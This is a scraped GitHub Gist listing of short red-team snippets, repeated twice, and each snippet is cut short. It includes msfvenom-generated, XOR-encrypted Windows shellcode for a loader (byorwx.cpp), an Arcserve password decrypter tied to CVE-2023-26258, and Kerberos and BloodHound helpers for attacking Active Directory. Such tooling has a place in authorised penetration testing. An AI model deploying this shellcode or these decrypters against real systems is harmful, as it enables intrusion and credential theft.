Daniel dadevel

## README.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dadevel
                / README.md
            
            
              Last active
              April 9, 2024 07:56
            
              
                BloodHound Query Utility
              
          
    Superseded by bloodhoundcli.

  
## README.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                dadevel
                / README.md
            
            
              Last active
              March 19, 2024 13:18
            
              
                Proxychains Quick Config
              
          
    Superseded by zsh-set-proxy.

  
## Dockerfile
# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12
FROM docker.io/library/neo4j:4.4.12
# apoc version from https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json
RUN wget -qO /var/lib/neo4j/plugins/apoc.jar https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/4.4.0.11/apoc-4.4.0.11-all.jar
# gds version from https://graphdatascience.ninja/versions.json
RUN wget -qO /var/lib/neo4j/plugins/gds.jar https://graphdatascience.ninja/neo4j-graph-data-science-2.2.3.jar
RUN echo 'dbms.security.procedures.unrestricted=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf && \
echo 'dbms.security.procedures.allowlist=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf

## style.css
 /* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */

.ext-sign-in-box {
  background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg");
}

## byorwx.cpp
#include <cstdint>

// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"

## CheckDLLs.ps1
# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73

# Get-Process | Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' | ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} | ft -auto
function Get-LoadedModules {
  param(
    [Parameter(Mandatory,ValueFromPipeline)]
    [System.Diagnostics.Process]
    $Processes,
    [Parameter(Mandatory)]
    [string[]]

## README.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dadevel
                / README.md
            
            
              Last active
              November 8, 2023 09:38
            
              
                BloodHound Queries
              
          
    Superseded by bloodhoundcli.

  
## ArcserveDecrypter.cpp
#include <windows.h>
#include <stdio.h>

// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp
// usage: ./ArcserveDecrypter.exe HEXBLOB
// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c

constexpr unsigned char key[] = { 0x50, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x61, 0x00, 0x20, 0x00, 0x76, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 0x77, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64, 0x00 };
constexpr auto key_len = sizeof(key);

## impacket-ccache-helper.py
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
import base64
import hashlib
import itertools
import os
import shlex
import sys

from impacket.krb5.ccache import CCache

## sharphound-import-fix.py
#!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from zipfile import ZipFile
import json
import shutil

# from https://github.com/fox-it/BloodHound.py/blob/273984883d9ca3dd21f6fca35ec88671cac3fc87/bloodhound/ad/trusts.py#L59
TRUST_DIRECTIONS = {
    0: 'Disabled',
    1: 'Inbound',
	# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12
	FROM docker.io/library/neo4j:4.4.12
	# apoc version from https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json
	RUN wget -qO /var/lib/neo4j/plugins/apoc.jar https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/4.4.0.11/apoc-4.4.0.11-all.jar
	# gds version from https://graphdatascience.ninja/versions.json
	RUN wget -qO /var/lib/neo4j/plugins/gds.jar https://graphdatascience.ninja/neo4j-graph-data-science-2.2.3.jar
	RUN echo 'dbms.security.procedures.unrestricted=apoc.,gds.' >> /var/lib/neo4j/conf/neo4j.conf && \
	echo 'dbms.security.procedures.allowlist=apoc.,gds.' >> /var/lib/neo4j/conf/neo4j.conf
	/* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */

	.ext-sign-in-box {
	background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg");
	}
	#include <cstdint>

	// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

	// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
	unsigned char buf[] =
	"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
	"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
	"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
	"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
	# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73

	# Get-Process \| Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' \| ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} \| ft -auto
	function Get-LoadedModules {
	param(
	[Parameter(Mandatory,ValueFromPipeline)]
	[System.Diagnostics.Process]
	$Processes,
	[Parameter(Mandatory)]
	[string[]]
	#include <windows.h>
	#include <stdio.h>

	// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp
	// usage: ./ArcserveDecrypter.exe HEXBLOB
	// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c

	constexpr unsigned char key[] = { 0x50, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x61, 0x00, 0x20, 0x00, 0x76, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 0x77, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64, 0x00 };
	constexpr auto key_len = sizeof(key);
	#!/usr/bin/env python3
	from argparse import ArgumentParser, Namespace
	import base64
	import hashlib
	import itertools
	import os
	import shlex
	import sys

	from impacket.krb5.ccache import CCache
	#!/usr/bin/env python3
	from argparse import ArgumentParser, RawDescriptionHelpFormatter
	from zipfile import ZipFile
	import json
	import shutil

	# from https://github.com/fox-it/BloodHound.py/blob/273984883d9ca3dd21f6fca35ec88671cac3fc87/bloodhound/ad/trusts.py#L59
	TRUST_DIRECTIONS = {
	0: 'Disabled',
	1: 'Inbound',